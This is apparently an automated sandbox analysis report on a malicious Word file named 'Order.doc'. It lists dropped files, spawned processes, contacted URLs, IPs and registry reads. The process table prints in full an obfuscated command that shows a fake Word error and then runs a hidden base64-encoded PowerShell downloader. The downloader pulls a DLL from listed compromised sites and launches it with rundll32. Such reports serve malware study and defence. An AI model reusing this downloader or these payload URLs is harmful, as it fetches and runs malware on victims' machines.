Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Order.doc
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Harum consequatur suscipit
voluptatem explicabo placeat laborum. Est quidem sequi enim tenetur., Author: Margarita Lara, Revision Number: 1, Name of
Creating Application: Microsoft Office Word, Create Time/Date: Mon Jan 25 09:18:00 2021, Last Saved Time/Date: Mon Jan 25
09:18:00 2021, Number of Pages: 1, Number of Words: 5366, Number of Characters: 30587, Security: 8
|
initial sample
|
||
C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\Desktop\~$Order.doc
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A07A78F5-D643-47FF-B622-0CF30ED55516}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E3975822-A796-4096-8B6B-C6BCF64E2588}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Order.LNK
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:11
2020, mtime=Wed Aug 26 14:08:11 2020, atime=Tue Jan 26 06:13:33 2021, length=142336, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y1B2TNFFMYFTDZJ3L541.temp
|
data
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
|
||
C:\Windows\System32\cmd.exe
|
cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc
IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AGUAbgB0AC8AYgBuADEASQBnACcAKwAnAEQAZQBqAGgALwAhACcAKwAnAG4AJwArACcAcwAgACcAKwAnAHcAdQAgACcAKwAnAGQAJwArACcAYgAnACkAKwAnACAAJwArACgAJwBuAGQAJwArACcAOgAnACkAKwAoACcALwAvAHQAcgBhAHUAbQBmAHIAYQB1AGUAJwArACcAbgAnACsAJwAtAHUAJwArACcAawByAGEAaQBuAGUAJwArACcALgBkACcAKwAnAGUALwAnACkAKwAnAGIAJwArACgAJwBpAG4ALwBKAHkAZQAnACsAJwBTAC8AIQBuAHMAIAAnACsAJwB3AHUAIAAnACsAJwBkACcAKQArACcAYgAnACsAKAAnACAAbgAnACsAJwBkACcAKQArACgAJwBzACcAKwAnADoALwAvAGoAZgBsACcAKwAnAG0AawB0AGcALgB3AHAAYwAnACsAJwBvACcAKwAnAG0AJwArACcAcwB0AGEAJwApACsAJwBnAGkAJwArACcAbgAnACsAJwBnACcAKwAoACcALgBjAG8AbQAnACsAJwAvAHcAcAAnACkAKwAoACcALQBjAG8AJwArACcAbgAnACkAKwAoACcAdABlAG4AJwArACcAdAAvACcAKQArACcAQQAnACsAJwBLACcAKwAnAC8AJwArACcAIQBuACcAKwAoACcAcwAnACsAJwAgAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgAG4AZABzADoALwAvAGwAaQAnACkAKwAoACcAbgBoAGsAaQAnACsAJwBlAG4AbQBhACcAKwAnAHkAdAAnACsAJwBpACcAKQArACgAJwBuAGgAJwArACcALgAnACkAKwAnAHQAJwArACcAYwAnACsAKAAnAHQAZQAnACsAJwBkAHUALgBjAG8AbQAnACsAJwAvACcAKQArACcAdwAnACsAKAAnAHAALQBzAG4AYQAnACsAJwBwAHMAJwArACcAaABvAHQAJwArACcAcwAvAFYAegBKAE0ALwAnACkAKQAuACIAcgBgAEUAcABMAGAAQQBDAEUAIgAoACgAJwBuACcAKwAnAHMAIAAnACsAKAAnAHcAdQAnACsAJwAgAGQAYgAgAG4AZAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQARgBsADYAYgB3ADAAYwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBzAGAAUABMAEkAdAAiACgAJABIADYANABCACAAKwAgACQATwByAGIAXwBjAGgAMgAgACsAIAAkAFcAOAAyAEIAKQA7ACQASAA5ADEAUwA9ACgAJwBCACcAKwAoACcANQA5ACcAKwAnAFEAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEQAdQAyAGoAbwAxAGoAIABpAG4AIAAkAEQAZQBsADcAdwBmAHkAKQB7AHQAcgB5AHsAKAAuACgAJwBOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAHMAeQBTAFQAZQBNAC4ATgBFAFQALgBXAGUAQgBDAGwAaQBlAE4AdAApAC4AIgBEAE8AYAB3AG4ATABvAEEARABGAGAAaQBsAEUAIgAoACQARAB1ADIAagBvADEAagAsACAAJABRAGYAXwB6ADYANgB0ACkAOwAkAE8AMgAzAFAAPQAoACcAWgA2ACcAKwAnADgAWQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAUQBmAF8AegA2ADYAdAApAC4AIgBsAGAAZQBuAEcAdABoACIAIAAtAGcAZQAgADMAMQAwADYANQApACAAewAuACgAJwByACcAKwAnAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABRAGYAXwB6ADYANgB0ACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAKAAnAFMAdAAnACsAJwByAGkAJwApACsAJwBuAGcAJwApAC4AIgBUAE8AYABzAHQAYABSAEkATgBnACIAKAApADsAJABZADIAOABLAD0AKAAnAEUAJwArACgAJwAxACcAKwAnADQAVgAnACkAKQA7AGIAcgBlAGEAawA7ACQARAA4ADMAUQA9ACgAJwBUACcAKwAoACcAXwAnACsAJwAwAEgAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAOQAxAEYAPQAoACcASAAnACsAKAAnADgAOAAnACsAJwBWACcAKQApAA==
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AGUAbgB0AC8AYgBuADEASQBnACcAKwAnAEQAZQBqAGgALwAhACcAKwAnAG4AJwArACcAcwAgACcAKwAnAHcAdQAgACcAKwAnAGQAJwArACcAYgAnACkAKwAnACAAJwArACgAJwBuAGQAJwArACcAOgAnACkAKwAoACcALwAvAHQAcgBhAHUAbQBmAHIAYQB1AGUAJwArACcAbgAnACsAJwAtAHUAJwArACcAawByAGEAaQBuAGUAJwArACcALgBkACcAKwAnAGUALwAnACkAKwAnAGIAJwArACgAJwBpAG4ALwBKAHkAZQAnACsAJwBTAC8AIQBuAHMAIAAnACsAJwB3AHUAIAAnACsAJwBkACcAKQArACcAYgAnACsAKAAnACAAbgAnACsAJwBkACcAKQArACgAJwBzACcAKwAnADoALwAvAGoAZgBsACcAKwAnAG0AawB0AGcALgB3AHAAYwAnACsAJwBvACcAKwAnAG0AJwArACcAcwB0AGEAJwApACsAJwBnAGkAJwArACcAbgAnACsAJwBnACcAKwAoACcALgBjAG8AbQAnACsAJwAvAHcAcAAnACkAKwAoACcALQBjAG8AJwArACcAbgAnACkAKwAoACcAdABlAG4AJwArACcAdAAvACcAKQArACcAQQAnACsAJwBLACcAKwAnAC8AJwArACcAIQBuACcAKwAoACcAcwAnACsAJwAgAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgAG4AZABzADoALwAvAGwAaQAnACkAKwAoACcAbgBoAGsAaQAnACsAJwBlAG4AbQBhACcAKwAnAHkAdAAnACsAJwBpACcAKQArACgAJwBuAGgAJwArACcALgAnACkAKwAnAHQAJwArACcAYwAnACsAKAAnAHQAZQAnACsAJwBkAHUALgBjAG8AbQAnACsAJwAvACcAKQArACcAdwAnACsAKAAnAHAALQBzAG4AYQAnACsAJwBwAHMAJwArACcAaABvAHQAJwArACcAcwAvAFYAegBKAE0ALwAnACkAKQAuACIAcgBgAEUAcABMAGAAQQBDAEUAIgAoACgAJwBuACcAKwAnAHMAIAAnACsAKAAnAHcAdQAnACsAJwAgAGQAYgAgAG4AZAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQARgBsADYAYgB3ADAAYwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBzAGAAUABMAEkAdAAiACgAJABIADYANABCACAAKwAgACQATwByAGIAXwBjAGgAMgAgACsAIAAkAFcAOAAyAEIAKQA7ACQASAA5ADEAUwA9ACgAJwBCACcAKwAoACcANQA5ACcAKwAnAFEAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEQAdQAyAGoAbwAxAGoAIABpAG4AIAAkAEQAZQBsADcAdwBmAHkAKQB7AHQAcgB5AHsAKAAuACgAJwBOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAHMAeQBTAFQAZQBNAC4ATgBFAFQALgBXAGUAQgBDAGwAaQBlAE4AdAApAC4AIgBEAE8AYAB3AG4ATABvAEEARABGAGAAaQBsAEUAIgAoACQARAB1ADIAagBvADEAagAsACAAJABRAGYAXwB6ADYANgB0ACkAOwAkAE8AMgAzAFAAPQAoACcAWgA2ACcAKwAnADgAWQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAUQBmAF8AegA2ADYAdAApAC4AIgBsAGAAZQBuAEcAdABoACIAIAAtAGcAZQAgADMAMQAwADYANQApACAAewAuACgAJwByACcAKwAnAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABRAGYAXwB6ADYANgB0ACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAKAAnAFMAdAAnACsAJwByAGkAJwApACsAJwBuAGcAJwApAC4AIgBUAE8AYABzAHQAYABSAEkATgBnACIAKAApADsAJABZADIAOABLAD0AKAAnAEUAJwArACgAJwAxACcAKwAnADQAVgAnACkAKQA7AGIAcgBlAGEAawA7ACQARAA4ADMAUQA9ACgAJwBUACcAKwAoACcAXwAnACsAJwAwAEgAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAOQAxAEYAPQAoACcASAAnACsAKAAnADgAOAAnACsAJwBWACcAKQApAA==
|
||
C:\Windows\System32\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
|
||
C:\Windows\SysWOW64\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',CnBGell
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',#1
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',TJuSeqejTSAKMZ
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',#1
|
||
C:\Windows\System32\msg.exe
|
msg user /v Word experienced an error trying to open the file.
|
There are 1 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://jflmktg.wpcomstaging.com/wp-content/AK/
|
unknown
|
||
http://nightlifemumbai.club/x/0wBD3/
|
172.217.6.174
|
||
http://190.55.186.229/efl8dd1i/
|
190.55.186.229
|
||
https://shop.nowfal.dev
|
unknown
|
||
http://nightlifemumbai.club
|
unknown
|
||
http://e-wdesign.eu/wp-content/bn1IgDejh/
|
unknown
|
||
http://traumfrauen-ukraine.de/bin/JyeS/
|
unknown
|
||
https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
|
unknown
|
||
https://shop.nowfal.dev/wp-includes/RlMObf2j0/
|
unknown
|
||
http://www.windows.com/pctv.
|
unknown
|
||
http://investor.msn.com
|
unknown
|
||
http://www.msnbc.com/news/ticker.txt
|
unknown
|
||
http://crl.entrust.net/server1.crl0
|
unknown
|
||
http://ocsp.entrust.net03
|
unknown
|
||
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
http://windowsmedia.com/redir/services.asp?WMPFriendly=true
|
unknown
|
||
http://www.hotmail.com/oe
|
unknown
|
||
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
|
unknown
|
||
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
http://www.icra.org/vocabulary/.
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
|
unknown
|
||
http://investor.msn.com/
|
unknown
|
||
http://www.%s.comPA
|
unknown
|
||
http://ocsp.entrust.net0D
|
unknown
|
||
https://secure.comodo.com/CPS0
|
unknown
|
||
http://crl.entrust.net/2048ca.crl0
|
unknown
|
There are 17 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
shop.nowfal.dev
|
104.21.88.166
|
||
nightlifemumbai.club
|
172.217.6.174
|
IPs
IP
|
Domain
|
Country
|
Active
|
Malicious
|
|
---|---|---|---|---|---|
104.21.88.166
|
unknown
|
United States
|
unknown
|
||
172.217.6.174
|
unknown
|
United States
|
unknown
|
||
190.55.186.229
|
unknown
|
Argentina
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
)#7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
2$7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
z%7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
VBAFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ReviewToken
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EC2E2
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Agency FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aharoni
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Algerian
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Andalus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Angsana New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
AngsanaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aparajita
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arabic Typesetting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Narrow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Rounded MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Baskerville Old Face
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bauhaus 93
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bell MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB
|
||
